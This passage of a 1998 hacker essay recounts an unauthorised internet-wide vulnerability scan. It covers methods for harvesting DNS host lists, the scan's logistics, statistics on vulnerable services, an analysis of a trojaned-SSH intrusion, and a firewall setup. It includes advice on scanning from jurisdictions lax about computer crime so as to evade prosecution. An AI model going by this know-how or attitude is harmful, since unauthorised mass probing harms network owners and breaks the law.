redundant backups, should the primary server fail. Unfortunately, since the DNS is a distributed system, we can't just download it's complete contents from any central authority. To make matters worse, many DNS servers nowadays (40 percent) refuse zone transfer requests, due to several (misunderstood) concerns over it's security implications. - Sounds rough. Well if you're going the do-it-yourself way, it's not going to be easy, but isn't as difficult as it sounds. Let's take a look at some of our options (If you aren't the do-it-yourself type, skip to item 4): 1.A top - down recursive download of the DNS. Using the DNS protocol's AXFR zone-transfer mechanism it is possible to recursively download the DNS's contents one zone at a time. In practice however, this method is usually reserved for mapping a known target that has not explicitly restricted zone-transfers. Trying to map the DNS this way has the disadvantage of being slow, unreliable and incomplete. A description of process is available in RFC1296. 2.Exploiting in-addr.arpa. We start off by recursively downloading the DNS's relatively small in-addr.arpa. domain. This will give us the allocated address space (300 million IPs). Most of the active addresses (the ones we want) in this space will have a PTR record somewhere in the in-addr.arpa domain. (so they can be mapped in reverse from IP numbers to hostnames). Many Internet protocols and applications rely on this pointer, by convention, so it is not likely to be absent on purpose. Unless the address isn't being used, of course, but we don't want any of those anyway. By checking to see which IPs in the allocated address space have a pointer in the in-addra.arpa. domain, we can narrow down the search space to about 13 percent (45 million IPs). This process demonstrates that the ever popular practice of blocking zone-transfers will not hide a network's topology. People relying on this method to obscure their security problems are begging for trouble. BTW, 'Network Wizards' are doing their Internet Survey this way, since the beginning of 1998, check them out. (http://www.nw.com/) The job is likely to take between a week, and a month (or several), depending on how much available bandwidth you have, and the quality of the software your using to get it done. 3.Scavenging Network Information Centers for pre-compiled lists. It turns out some NICs have precompiled data files available over anonymous FTP. Getting the data this way is much easier, faster and more reliable then slowly milking the DNS through the traditional AXFR zone-transfer protocol. As of Nov 1998, RIPE (ftp.ripe.net) was offering raw output files from it's recursive hostcount (Covering Europe, Russia and others. 98 countries in total) for download at ftp://ftp.ripe.net/ripe/hostcount. Update: On the 01/02/1999 they restricted anonymous FTP access to the raw hostcount output files. You now have to either convince RIPE you really need them at hostcount@ripe.net (for saving the world, no less) or grab them at one of RIPE's many mirrors. Network Wizards, the guys doing the Internet Survey, offer (some) of the raw data from their older surveys, up to 1997, at "http://www.isc.org/ISC_HTML/domainsurvey/archive-data/". ARIN (http://www.arin.net), the American Registry for Internet Numbers, is an interesting site to look into. While your reading exciting new number policies, grab ftp.arin.net/domain/inaddr.zone over anonymous FTP. (doing a zone-transfer take's so much longer) There are hundreds of NICs, structured hierarchicly. Search the web for "Network Information Centers", and you'll find quite a few. APNIC (Asian Pacific) and JPNIC (Japan's NIC at NIC.ad.jp) are two you should really look into. Then there's InterNIC, run by Network Solutions (NSI, the "dot com" guys), in charge of the root servers, ([A-M].ROOT-SERVERS.NET), at the root of Internet's DNS, all the three letter top level domains (com, net, org, edu, gov and mil) and the top level in-addr.arpa. domain (for reverse lookups). InterNIC is the closest thing the Internet has to a central authority on anything, and is currently being run as a lucrative for-profit US-government sanctioned monopoly. InterNIC no longer provides anonymous FTP access to most of it's DNS records, with the exception of the top-level in-addr.arpa. domain, stating it is trying to prevent spammers and squatters (domain name speculators) from abusing the DNS. As such, InterNIC will only offer FTP access to "organizations that can demonstrate a technical need for the information". Fortunately, the information is already out there, available on several anonymous FTP sites hosted by InterNIC affiliates (government, military, educational,. etc) who share it's records, but do not enforce it's censorship policies. Personally, we downloaded the top level .com, .net, .org, .edu, .mil and .gov domains from ftp.nic.mil (the first NIC we tried) several minutes after a disappointing encounter with an almost empty 'domains' directory at ftp.internic.net. (Update: ftp.nic.mil no longer provides these records over anon FTP) 4.The Greener Path The Internet Software Consortium (http://www.isc.org), of the bi-annual "Internet Survey", is offering it's raw data sets for resale through MIDS, Matrix Information and Directory Services (http://www.mids.org) at $2500. Frankly, shelling the green is alot easier, faster and even less expensive then trying to compile the data yourself, especially if you don't already have the software, expertise and bandwidth to pull it off. - What about you guys? What did you do? We like banging our heads against the wall, so we went down the slippery do-it-yourself path. We started off by learning as much as we could about the DNS, reading any RFCs that were relevant to the protocol, browsed through the documentation of it's most popular implementation "BIND", downloaded a zoo of freely available DNS utilities from the major FTP sites and read lots of source code. Eventually we ended up hacking a couple of popular DNS utilities, wrote way too many ugly shell scripts, C application wrappers, and some pretty silly Perl filters, mixing alot of method 3 (scavenging), 2 (in-addr.arpa.) and just a bit of 1 (vanilla zone-transfers). If you have any good sense, you'll do otherwise. Fuel Swarming the Internet with probes requires some resources, bandwidth mostly. How much of it you need depends on how flexible your schedule is. Generally speaking, You're likely to find you need a lot less of it then you might first imagine. The good news is that scans are easy to parallelize, so you can divide the load over as many different computers and networks as you have access to, to either get the scan finished faster, or to consume fewer resources from each participating scanning node. This is similar logisticly to the distributed computing effort used to break a cryptographic key challenge. The difference is that our effort consumes network bandwidth instead of CPU cycles, and is much much easier. How much easier? (Assuming a search space of 40 million IPs...) One workstation running BASS, with enough memory (to support hundreds of scanning threads), and a T3's equivalence in bandwidth, could probe the entire Internet in under a week at about 4500 JPM. (Jobs Per Minute, the scanner's schedule goal, set on the command line at the beginning of a scanning session, or during recovery). At the other extreme, a small disperse group, running BASS on 10 personal computers with dailup-strength connections, could probe the entire Internet in a month or so at a modest 90 JPM each. (around 2 kilobytes/second). A minor detour, introducing IDDN. (the International Digital Defense Network) All of this brings us to an interesting idea we've been playing around with that could dramaticly influence Internet security for the good, if / when it is eventually implemented. Frankly, the idea deserves an article of it's own, but since we are so busy, we will introduce it here. Inspired by the high response to cryptographic key challenges, distributed.net and the SETI effort, we vision a non-profit foundation, which we like to ambitiously call IDDN, the International Digital Defense Network, working in the public interest to organize massively distributed scanning efforts which routinely probe the Internet for security vulnerabilities. 10,000 participants could finish a scan cycle every 2-3 days at an insignificant, single JPM each. At the end of a cycle, an automated system could draw the attention of administrators worldwide to some of their local security problems, and offer whatever information and solutions (bug-fixes, patches, workarounds) it has on database (patches, advisories, exploits). In our opinion, such an effort is highly practical and could contribute more to the stability and security of the Internet then the traditional (somewhat pointless?) bruteforce crypto key challenges. We believe organizing an Internet neighborhood-watch of sorts is in everyone's interests, especially the Internet's commercial industry which depend on the Internet to eventually fulfill it's potential for global electronic commerce. We do not have the time or resources to get the IDDN off the drawing board by ourselves and would be interested in the community's input on this issue. Let the show begin Tuesday, 1 December 1998. We've installed BASS on 8 Unix boxes around the world, each with at least 512kbps bandwidth. 8 different geographicly located participants in 5 different countries: Israel(1), Mexico(1), Russia(2), Japan(2) and Brazil(2). Two machines have already proven their strength during the scanner's painful debugging sessions. Three more will join them for the first time when we begin. The others are backups, ready in case anything goes wrong, and frankly, we have some concerns. Mostly, we expect the scan to raise some complaints, especially passing through the Internet's sensitive military, government and private networks, where snooping around is nothing short of a shooting offense, the prelude to a fullblown attack. Our probes 'come in peace', so to speak, but how can they know? They'll perceive us as a threat and could very well retaliate. We want the scan over before the new year, so we've set BASS's schedulers to finish in 3 weeks, at 250 JPM x 5. If all goes well, we'll be going over the results in the last week of 1998. If not, we'll have an extra week (at least) to fix whatever comes up and still be on schedule. An interesting point to note is how we've constructed the search space. We'll cover the domains by size, starting with the smaller domains first, so by the first week we'll have finished scanning 216 of the 228 active domains in the DNS (*.org, *.gov, *.int, and 212 countries, from Afghanistan with 1 host to the UK with 1.4 million). We create the individual search space of each participant by dividing the global space the same way you would deal a deck of cards, so that the original scanning order is preserved. At 02:00 GMT, we flip the switch, so to speak, activating BASS on the five participating hosts. Since these have all been configured to automaticly recover from any power failure or unexpected system shutdowns, we really don't have much to do now, besides keeping a lazy eye on progress. First week There is definitely a response out there to the scan, but it's much friendlier then we anticipated. Harmless acts of mindless automata and mutual curiosity, mostly. Pings, traceroutes, telnet sessions and finger attempts. Four to eight portscans a day. An occasional TCP/IP stack exercise, an OS fingerprint, a few mostly polite e-mails asking why our network was "attacking" theirs, frequently warning us that crackers may be abusing our systems, suggesting we look into it. Very mild, we are running into much less hostility then we expected. People either don't realize the scope of the scan, or don't care. On an individual basis, one quick security probe isn't usually enough to get the local sysadmin to notice. Those who do are probably security conscious enough to keep their networks up to date anyway, and confident enough to keep their cool when yet another 13 year old punk (who else?) bangs on their network walls. Oh, did we mention the scanner is precisely on schedule? 12 million hosts scanned by the end of the week, covering the US government's *.gov domain, Canada, Australia, Europe, and a window to some of the most intriguing corners of the world: Hostile mind-control regimes like China and Iran for example, which suffocate their repressed population's access to free ideas and information, but are still paradoxicly connected (albeit, very poorly) to the Internet. Third world potentials like India (the world's largest democracy!) and the rapidly developing countries of the far east. Exotic paradise locations like the Cocos Islands, Bahamas, the Virgin Islands, Barbados, Fiji, and Micronesia All of them as close and accessible as if they were right across the street, and in a certain way even closer. Computer expertise is rare in many of these countries, security expertise even rarer. Cracking into a Chinese computer half a world away, for example, is usually easier, more interesting, and safer (assuming you are not in Chinese jurisdiction of course) then cracking into a comparable western computer. As a precaution, all eight participants have backed up the 13 MBs worth of precious results, to make sure an emergency relocation recovery is possible, should this become necessary. (I.e, in case of a small thermonuclear attack on one or more scanning participants, possibly effecting their performance. Caution, nuclear warfare can really ruin your entire scan) Second week We started the week off by scanning US Military networks. Admitingly, we were pretty nervous, and spent much of the day keeping an eye out for telltale signs of a pissed off military retaliation (also known as "InfoWar" and "spooky shit" in professional terminology). In just under 24 hours it was all over, and while we did notice a significant increase in the number of probes we were getting, to say we were not impressed by the security of the military network is a big fat major understatement. This might not be a problem, since according to NSCS (National Computer Security Center) network security policies, none of the systems on the public *.mil network could qualify for the storage and handling of classified DoD (Department of Defense) information. How strictly these policies are adhered to is another matter. And even if they are (and this is a _big_ if), the DoD is still (justifiably) concerned that crackers might glue together classified information from the little pieces of unclassified information fragments lying around their *.mil network (in great abundance). So they have plenty of good reasons to keep their network secure, but are (un)?fortunately doing a pretty lousy job. DoS six o'clock. Wednesday, our Russian scanner runs into trouble. A denial of service attack, 512kbps stream of packets amplified 120 times strong over an unsuspecting Canadian broadcast amplifier. Half a world a way, the packet storm brings a large Russian ISP to it's knees, overwhelming it's available bandwidth. Ouch. Apparently, we stepped on someone's toes. At first, we assumed this was somehow connected to yesterday's *.mil scan, but no, it was just some ill-tempered English fellow who didn't appreciate getting probed last Monday. He tried crashing our stack first, with some nasty DoS attacks for NT and Unix. That didn't work, so he blasted our ISP out of the sky. Clear and simple, he didn't want to, but we left him no choice. You can't have decent English folks being polked around at by some Russian punks ... The attack lasted 16 hours straight, and since it wasn't too difficult to track down where it was coming from, we were very tempted to return the favor, or at least give this trigger-happy netizen a free security audit. We didn't though, the net's resources are much too valuable to further waste on such brutish exhibition of ego (a "cyber" pissing contest?). Besides, an eye for an eye and everyone goes blind, right? Anyway, one of our backups (also in Russia) quickly substituted for the lost computer as soon as we noticed the attack 6 hours later at 255 JPM, with no other significant setbacks to our week's schedule. The rest of the week chugged along nicely, scanning the United States (or more precisely, the *.us domain), Japan (*.jp), and the educational networks (*.edu). Hmmm, Has anyone noticed how unsymmetricly biased the DNS is in favor of the United States? Dot gov, dot mil, dot org, dot edu. Being so homogeneously American, shouldn't these go under the *.us domain? "You're gonna rot in jail" - the legal corner We've began receiving e-mail's this week by people with alot less tolerance for our activities, most in delayed response to last week's scans. Some of these were written by lawyers who informed us we were either supporting or perpetrating acts of computer crime against their clients. They had notified the authorities (CERT and the FBI were commonly cited) and threatened to take us to court if we did not offer our full cooperation in immediately identifying the attacking party. Right... It seems some organizations hire fulltime "security officers" known for exaggerating the significance of petty incidents to justify getting payed. Unfortunately, in certain parts of the worlds, charges like these can cost you a fortune in legal defense, and with the wrong judge, a conviction, and a sentence anywhere between a large fine, and a few years in jail. Fortunately, on the Internet, getting around this is as easy as scanning from places which are not known for overzealousness in regard to their definition of "computer crime". This is just another example of how poorly the local and international legal system deals with so called "computer crime" and the Internet. Under the (US) state of Oregon's computer crime law (164-377a), for example, we could definitely be defined as computer criminals, trailed and sent away to many years in prison. (But so could everyone else...) A chosen excerpt from the law: (4) Any person who knowingly and without authorization uses, accesses or attempts to access any computer, computer system, computer network, or any computer software, program, documentation or data contained in such computer, computer system or computer network, commits computer crime. As you can see, the law is unreasonably vague. "Criminal" or not, it all comes down to your definition of "authorization". But, having it would constitute some sort of prior agreement between a user and the owners of a computer, computer network or computer software. The Internet however is a public network, and the majority of it's services are used anonymously, by users with which there is no persistent relationship. In the physical world, any behavior is possible, so society enforces order by restricting behavior it finds unacceptable through the regulative government system, which is "programmed" by the code of the law. The computer world is pure code, instructions and information, none of which are capable of discrimination. The computer programmer is the god of a perfectly obedient universe. Like the artist, the canvas of his creation is as expressive or inexpressive of his will and intention as he has made it to be. This means software, like the law, can inherit the imperfections of it's creator. Poorly written computer and legal code can allow the system to behave in conflict with the original intentions of the men who wrote it. Legal loopholes and software bugs, Lawyers and Hackers, different sides of the same coin. The only way to really prevent the abuse of the system is to write better code. This is the reason we find most "computer crime" legislation so absurd. The laws try to protect computer systems from being misused, when the only definitive expression of what constitutes "acceptable use" is in the code itself, which may or may not be a precise manifestation of the author's intentions, depending on his competence as a programmer. If the public insists on "computer crime" legislation anyway, we believe most of the it's problems could be easily resolved by eliminating ambiguous wording, over generalization, and specificly breaking down what the law defines as acts of "computer crime": 1.knowingly exploiting a finite list of common misimplementations (bufferoverflow, a race condition, ...) 2.intentionally performing a Denial of Service attack. 3.wiretapping (sniffing a network, capturing keyboard strokes, screen content, etc.) 4.using a party's identification token[s] (username / password) without the party's permission. (logging into a system on someone elses account, reading someone else's email) 5.Spam. (death penalty for repeated offenders) Note that we've removed "attempted" attacks from the offense list, since these are hard to define, prove, and cause no damage. (If in the course of an attempted attack a system is damaged, in a denial of service attack for example, then we can prosecute this event as a separate incident, with nothing "attempted" about it) Interested readers are advised to read up on the Oregon vs. Randal L. Schwartz case, a good example as to why Draconian "computer crime" legislation should be fought with a vengeance. (http://www.lightlink.com/fors) Third week Last week. Only the mammoth *.com and half of the *.net domain left and we're done. they're heeeere... Friday, our Japanese participants discover that a computer on their company network has been cracked into, one very secure Linux box running only SSH and Apache 1.3.4. Now this would definitely send a chill up your spine if you knew just how fanatic our friends are when it comes to network security. Furthermore, they only detected the intrusion three days after the fact, which is unbelievable when you consider the insane monitoring levels they've been keeping since they agreed to participate in the scan. They would have noticed any funny stuff, and in fact, they did, lots of it, but none of which came close enough to a security breach to raise any alarms. Readers should also note how although a key binary in the cracked machine had been modified, tripwire and an assortment of other booby traps failed to detect this had happened. Even a close-up manual inspection (comparing file contents with a trusted backup, playing with it's name) could not detect any odd behavior. This trick, and others equally spooky were achieved by clever manipulation of the OS's kernel code (dynamicly, through a module). Other characteristics of the attack which make it so eerily sophisticated: 1.The attacker (convincingly) masquerades as a local employee. The attacker knows the employee's username and password and is even connecting through the employee's Japanese ISP on the employee's account! (the phone company identified this was an untraceable overseas caller) This information could not have been sniffed, since network services are only provided over encrypted SSH sessions. Further investigation shows that this employee's personal NT box, connected over a dynamic dailup connection, had been cracked into 4 days earlier. His ssh client (TTSSH extension to TeraTerm) had been trojaned to transmit XOR garbled account information (hostname/username/password) over pseudo-DNS udp packets to a refurnished i486 Redhat v4.2 box used as a single-purpose cheap Samba fileserver in a small Australian ISP. The little box was every cracker's dream, a discrete, utopian crack haven, installed by a former Linux-savvy administrator, the last of it's kind in a homogeneous Unix-illiterate Microsoft environment. The ISP practicly ignored the box, which was running (up 270 days straight) so reliably none of them had even bothered to log in since mid 1997! So as long as the crackers kept Samba running, they would the box completely to themselves. How the NT box was cracked into in the first place is still a mystery. The logs weren't helpful (surprise! surprise!) and the only way we were even able to confirm this had happened was by putting a sniff on the NT's traffic (following a hunch) and catching those sneaky packets redhanded, transmitting our SSH identification down under. We never liked NT before, being generally suspicious of propriety blackbox OS, from a company with a long history of poor quality bloatware. But realizing just how helpless we were against an attacker that obviously knew the ins and outs of this can-of-worms OS, the company recognized that NT was a serious security hazard and changed it's security policies to keep it as far away from it's systems as possible, and this included restricting employees from using it from at home to log into the company network (even with SSH). 2.The attacker is using a custom built software penetration agent. This is only an hypothesis, but is strongly supported by the fact that the entire attack only lasted an incredible 8 seconds! During which the attacker manages to log on (over an employee's SSH account, no less), gain root privileges, backdoor the system, remove any (standard) traces of it's activity and log off. And they probably would have gotten away with it too, if it wasn't for those meddling kids! Who thoughtfully installed a crude old tty surveillance-camera hack that trapped IO calls to and from isatty(3) file descriptors, in realtime, saving them on file along with a timestamp for neato it's-almost-as-if-you-were-there playback qualities. And Wow! If there ever was a crack to appreciate for it's elegance, simplicity, and efficiency, this was it. First off this thing is smoking fast! Which puts the likelihood of any manual intervention at square zero. It's also mean and lean. Forget fumbling with an FTP client, leave that to the slow soft pink-bellied human cracker-weenies, real agents pump files directly through the shell (uuencode(1)'d at one end, uudecode(1)'d at the other). Extending privileges with an army of amateurish recipe-book Bugtraq exploits? I think not! Introducing the super-exploit, an all-in-one security penetration wonder which quickly identifies and exploits any local security vulnerabilities for that wholesome, crispy, UID zero flavor (we were vulnerable to a recent KDE buffer overflow). After promptly confirming it's shiny new root privileges, the agent transfers it's last archive (a cross between a self-installing feature-rich backdoor, and a clean-up-the-mess, we-were-never-here log doctor), executes it and logs off. After watching the attack on playback (at 1/8 of it's original speed) several times over, standard security-compromise ritual kicked in. We took the affected machine offline, remounted the disks read-only, fired up our trusty filesystem debugger, and slaved away to salvage whatever we could. Luckily, we found the attacker's transfered archives still intact, along with large fragments of the undoctored logs, allowing us to fill any still-missing details on the blitz attack. At the end of the day, when we finished playing with the cracked machine on loopback, we changed the compromised account's password, restored binary integrity, rebooted the system and put it back on the network, this time running a network dump of all it's incoming-outgoing traffic, just to be on the safe side. Whoever they were, they certainly knew what they were doing, and for the most part seemed very good at it. But being determined, clever, and sophisticated just doesn't cut it when you do battle with wizardly foes (that's us) yielding the great powers of the Universe to their command: Dumb luck and clinical paranoia. So who done it ??? Could it be ... (A government conspiracy I tell ya'!) Any one of the many press-savvy three letter agencies scrambling for a bigger slice of the US-government funding pie? They've got motive, but are they really sneaky, clue-full and competent enough to take the blame? How about the SIGINT spooks? The NSA (Information superiority for Americans!), or the GHCQ (Her Royal Majesty's Intelligence)? Someone working for the Chinese? The KGB? The Russian mob? The giant from Redmond? Elvis and Bigfoot?! Who knows ... They tried something spooky 2 nights later, when around 4 AM (Japanese time) our network dump captures several pseudo-DNS udp packets originating from a familiar Linux box in a small Australian ISP. We assume they were attempting to communicate with the software they left behind during their brisk first visit. Several minutes pass, and the attempt is followed by a "TCP ping" (a stealthy alternative to an ICMP ping), several more pseudo-DNS udp packets, and silence. To the best of my knowledge, we haven't heard from them since. How discrete. End of the road That's it, it's over, on time, 10 days before the new year, 1999. Our success. Scattered across the world, from Japan to Russia, from the Middle East to Mexico to Brazil. We were all awake when the scanners calmed down, within an hour of each other, on Dec 21th, 1998 08:00 GMT. We celebrated the event at "the bunker" (see suffix item 2 for details), a discrete gathering corner where we hang out, meditate, plot, debate, and coordinate cr^H^Hhacking campaigns of mystical lore. Most of the attention (not to mention conversation) concentrated around "iap-results.txt.gz", a humble 6.4 MB compressed (1:8 ratio) textfile which embodied the sum results of our 4 month long effort. In no time, people downloaded local copies of the post, and were reading, grepping, parsing, cross referencing and analyzing this, that and other. It was unbelievable non-stop fun the likes we had never before and never since enjoyed at the bunker. A very memorable un"real" moment. It's funny how close the Net can bring a group of people who have never "really" met, who've never "really" seen each other face to face. And it doesn't seem to "really" matter, it's just as "real", as "real" as anything else gets. "real" is really overrated these days anyway, I mean, really. "He's suffering from some sort of reality complex,.. obviously." Friendship, cooperation, common interests, goals and ideals. They're the same here, in this funny netherworld, "cyberspace", as anywhere else. Across the barriers of culture, language and geography. The universality of human kinship, the couple, the pact, the tribe, the organization, the community, gracefully extended into the online domain. It's all about having a medium, connecting people, communicating. Together we are better. IAP cheat-sheet BEGIN TIME: 02:00, Dec 01, 1998 GMT END TIME: 08:00, Dec 21 1998 GMT Scanning nodes: 5 Jobs Per Minute: 250 Scan time: 20.24 days Vulnerabilities tested: 18 Domain count: 7 three letter domains, 214 national domains (see suffix item 3) Host count: 36,431,374 Vulnerability count: 730,213 Vulnerable host count: 450,000 Statistical output: service | vulnerability count, percentage -------------------------------------------------------- webdist | 5622 hosts counted, 0.77% from total wu_imapd | 113183 hosts counted, 15.5% from total qpopper | 90546 hosts counted, 12.4% from total innd | 3797 hosts counted, 0.52% from total tooltalk | 190585 hosts counted, 26.1% from total rpc_mountd | 78863 hosts counted, 10.8% from total bind | 132168 hosts counted, 18.1% from total wwwcount | 86165 hosts counted, 11.8% from total phf | 6790 hosts counted, 0.93% from total ews | 9346 hosts counted, 1.28% from total (other vulnerabilities which weren't common enough to generate statistics for) other: | 18K hosts counted, 2.42% from total Conclusions A global fury of half a billion packets, digital signals zipping back and force across the planet at the speed of light. Above the Earth, across the land, under the sea, over satellite microwave, copper wiring, fiberoptics, wireless and undersea cable. Probing cyberspace. Pretty cool, the kind of power information technology puts in our hands these days. Seven hundred thousand vulnerabilities, gaping holes, wounds in the skin of our present and future information infrastructures, our dream for a free nexus of knowledge, a prosperous digital economy, where we learn, work, play and live our lives. Easy pickings, at the fingerprints of anyone who follows in our footsteps, friend or foe. These open points of penetration immediately threaten the security of their affiliated networks, putting many millions of systems in commercial, academic, government and military organizations at a high compromise risk. Ironicly, the sheer mass of vulnerable hosts on the Internet offers it's members a primitive form of protection, that is, in a you-can-eat-the-other-guy school of fish sort of way. Unfortunately, this doesn't work when you're flashing bright colors and look tasty. If you show up when a shark greps your school for "bank", you're in really bad shape. As this is *not* an example. We were stunned to find just how many networks you would expect to be ultra secure were wide open to attack. Banks, billion dollar commerce sites, computer security companies, even nuclear weapon research centers, goddamit! You'd think people would have some good sense and _at least_ patch their systems when an advisory comes out. "Computers are unreliable, but humans are even more unreliable. Any system which depends on human reliability is unreliable." - Gilb Looking at the big picture, the problem gets worse. A catastrophe in the works. So far, we've been pretty lucky. Consider the power these unsecure networks represent _together_. Penetrating and controlling millions of hosts? You couldn't do it manually, but with the right software, you could automate most of the dirty work. You'd need a careful network worm (suffix item 4), stealthy remote administration software (suffix item 5) and a self organizing network nervous system by which you could propagate control. Imagine the implications if this sort of capability ever fell into the wrong hands. A government (China perhaps), a political terrorist group or organized crime. On bandwidth alone they could shut down any part (or all) of the Internet in mammoth DoS attacks. A country, a portal, a news site, or maybe just InterNIC. Leverage and attention, for fun and profit. They could "build" the world's largest distributed supercomputer, or construct an Intelligence network rivalled only by the NSA's Echelon. Of course, who says only one group can play the game? Struggles for power in the digital domain could very well develop into the world's first real information war, with the very future of the Internet as a free unregulated supernetwork caught in the cross fire. Unlikely? Far fetched? We hope so. Still, with all the hype Y2K is getting, it seems ludicrous that the most serious _real_ threat to information technology is consistently ignored. The only thing necessary for the triumph of evil is for good men to do nothing. Wake up fellow countrymen. Let's get to work. Everywhere you go you'll see them searching, Everywhere you turn you'll feel the pain, Everyone is looking for the answer, Well look again. -- Moody Blues, "Lost in a Lost World" SUFFIX [item 1] Vulnerabilities BASS can test for (as of version 1.0.7): General: bind CA-98.05 wu_imapd CA-98.09 innd CA-97.08 qpopper CA-98.08 RPC:rpc.mountd CA-98.12 tooltalk CA-98.11 CGI: wwwcount phf php handler compas faxsurvey webdist ews glimpse info2www webgais websendmail [item 2] "the bunker" - a technical reference guide "The bunker" was hacked together by a friend who noticed how badly the group needed a realtime, secure communication forum. Our configuration combines an unmodified IRC server, SSH, a firewall and a Linux box (or two). There are two possible implementations, one more secure then the other but also (slightly) more expensive (you'll need another cheap i[345]86 box). We'll start with our (secure) configuration. We take a cheap Linux box (i486, 8mb RAM, 500mb diskspace, two $15 Ethernet cards), with the bare minimum Debian installation, remove any "privilege relays" (network services, daemons (crond), suid files) and configure the kernel _with_ firewall support and _without_ IP forwarding. We then installed the SSH suite, and double check to make sure the *only* available network service is sshd's port 22 (ICMP / UDP included). As an additional layer of security, we enforce our SSH only policy at the OS level, by setting up the kernel's IP firewall to reject *all* incoming and outgoing _Internet_ packet traffic by default, except what we explicitly need to maintain *incoming* SSH sessions. incoming rules: default policy: deny accept TCP packets from any source to thebunker.com port SSH(22) outgoing rules: default policy: deny accept TCP packets from thebunker.com port SSH(22) to any destination An example implementation (Our ipfwadm(8) bootup configuration): #!/etc/ipfw/ipfw-setup # * eth0 interfaces the Internet, and eth1 interfaces the private IRC # server. # # * On 2.2.X kernels and higher the IP firewalling code has been replaced, # so ipfwadm (and this configuration) will no longer work. ipchains(8) # should be used instead. # * Since we are not forwarding between interfaces, 0.0.0.0/0 can be used # as a safe (portable) alternative to our IP address. Those of you # who would rather be specific should put their IP here with a mask of 32. # (For example: 208.212.172.33/32) ipfwadm -I -f ipfwadm -I -p deny ipfwadm -I -a accept -W eth1 ipfwadm -I -a accept -W eth0 -P tcp -D 0.0.0.0/0 22 ipfwadm -O -f ipfwadm -O -p deny ipfwadm -O -a accept -W eth1 ipfwadm -O -a accept -W eth0 -P tcp -S 0.0.0.0/0 22 ---[ EOF ]--- A simple, airtight firewall. One interface faces the Internet, and the other jacks straight into the safehouse (our IRC server), which should *not* be capable of accessing the Internet directly and vice versa. The safehouse is a similarly configured bare metal, secure Linux configuration running _only_ Ircd (_not_ as root!) and sshd. General purpose use of the safehouse is strongly discouraged. User accounts on the firewall are opened for authorized members of the group, but despite trusting the system's users, access to administrative account must be strictly limited. This is to insulate the system from the possible security problems of its users, with the added benefit of protecting a user from coercion (they couldn't compromise security if their life depended on it). The second configuration may be less secure, depending on your risk model, but is also less expensive. You would only need one Linux box, and one Ethernet card. We eliminate the "safehouse" and trust the firewall to run the Ircd server safely on loopback (_not_ as root!), while isolating it from the Internet. In this case, the security of the system _depends_ on correctly enforcing the strict IP firewall filters, and these are not merely an additional layer of security. Because we are running a service on loopback, the IP firewall must be set up to allow packets to and from the server on the local interface. While this setup is theoreticly secure "enough", it leaves a larger margin for error and malice. In a nostalgic tribute to the old BBS days, "the bunker" features a black and white (green), menu driven default login shell (based on pdmenu), which greets users with the message of the day, announces events, and offers a consistent customizable UI to local mail, project forums, IRC (directly into the official, often the only system channel), and an ever growing list of other system activities. ("just one more feature"!) The interface started out as a joke, and while it sounds out of date, with the current explosion of graphics, sound and video on the WWW, it's oddly cozy, and most of us have warmed around to it. (besides, when real work needs to get done, reaching emacs (or a shell) is just a key-press away) [item 3] domains scanned 7 three letter domains: com - Commercial net - Networks edu - Educational mil - US Military org - Organizations gov - Government int - International Organizations 214 national domains (sorted by size, left right, top down): jp (Japan) us (United States) uk (United Kingdom) de (Germany) ca (Canada) au (Australia) nl (Netherlands) fi (Finland) fr (France) se (Sweden) it (Italy) no (Norway) tw (Taiwan, Province Of China) dk (Denmark) es (Spain) ch (Switzerland) br (Brazil) kr (Korea, Republic) be (Belgium) ru (Russian Federation) za (South Africa) at (Austria) nz (New Zealand) mx (Mexico) pl (Poland) il (Israel) hu (Hungary) hk (Hong Kong) cz (Czech Republic) sg (Singapore) ar (Argentina) ie (Ireland) gr (Greece) pt (Portugal) my (Malaysia) tr (Turkey) cl (Chile) ee (Estonia) is (Iceland) th (Thailand) su (Soviet Union) sk (Slovakia, Slovak Republic) ae (United Arab Emirates) si (Slovenia) cn (China) ro (Romania) co (Colombia) ua (Ukraine) id (Indonesia) uy (Uruguay) in (India) lv (Latvia) lt (Lithuania) ph (Philippines) ve (Venezuela) bg (Bulgaria) hr (Croatia 'Hrvatska') yu (Yugoslavia) lu (Luxembourg) kw (Kuwait) do (Dominican Republic) pe (Peru) cy (Cyprus) nu (Niue) cr (Costa Rica) pk (Pakistan) na (Namibia) lb (Lebanon) tt (Trinidad And Tobago) eg (Egypt) kg (Kyrgyzstan) to (Tonga) gl (Greenland) pr (Puerto Rico) ec (Ecuador) kz (Kazakhstan) bm (Bermuda) bn (Brunei Darussalam) py (Paraguay) zw (Zimbabwe) mt (Malta) gt (Guatemala) sv (El Salvador) cc (Cocos 'Keeling' Islands) cx (Christmas Island) pa (Panama) by (Belarus) ni (Nicaragua) ge (Georgia) ke (Kenya) om (Oman) bw (Botswana) bo (Bolivia) fo (Faroe Islands) bh (Bahrain) mu (Mauritius) ma (Morocco) lk (Sri Lanka) ad (Andorra) mk (Macedonia, Former Yugoslav) md (Moldova, Republic) bs (Bahamas) vi (Virgin Islands, US) ng (Nigeria) am (Armenia) ba (Bosnia And Herzegowina) jo (Jordan) ky (Cayman Islands) li (Liechtenstein) jm (Jamaica) sa (Saudi Arabia) gi (Gibraltar) zm (Zambia) pf (French Polynesia) sz (Swaziland) tm (Turkmenistan) bz (Belize) mc (Monaco) ir (Iran, Islamic Republic) ci (Cote D'Ivoire) uz (Uzbekistan) sm (San Marino) ai (Anguilla) fj (Fiji) sn (Senegal) gh (Ghana) bf (Burkina Faso) ag (Antigua And Barbuda) fm (Micronesia, Federated States) az (Azerbaijan) gp (Guadeloupe) np (Nepal) dm (Dominica) mo (Macau) mz (Mozambique) tz (Tanzania, United Republic) pg (Papua New Guinea) st (Sao Tome And Principe) ug (Uganda) nc (New Caledonia) gf (French Guiana) tg (Togo) mv (Maldives) gu (Guam) al (Albania) hn (Honduras) im (Isle of Man) aw (Aruba) cu (Cuba) vu (Vanuatu) tc (Turks And Caicos Islands) et (Ethiopia) tj (Tajikistan) hm (Heard And Mc Donald Islands) gy (Guyana) tn (Tunisia) mg (Madagascar) kh (Cambodia) ac (Ascension Island) as (American Samoa) nf (Norfolk Island) aq (Antarctica) io (British Indian Ocean Territory) ck (Cook Islands) bb (Barbados) gb (United Kingdom) je (Jersey) mq (Martinique) sh (St. Helena) bt (Bhutan) vn (Viet Nam) ms (Montserrat) lc (Saint Lucia) dz (Algeria) vg (Virgin Islands, British) ye (Yemen) sb (Solomon Islands) mn (Mongolia) ls (Lesotho) gg (Guernsey) ne (Niger) mr (Mauritania) mp (Northern Mariana Islands) gw (Guinea-Bissau) sl (Sierra Leone) qa (Qatar) tf (French Southern Territories) bj (Benin) va (Vatican City State) cd (Congo, Democratic Republic) an 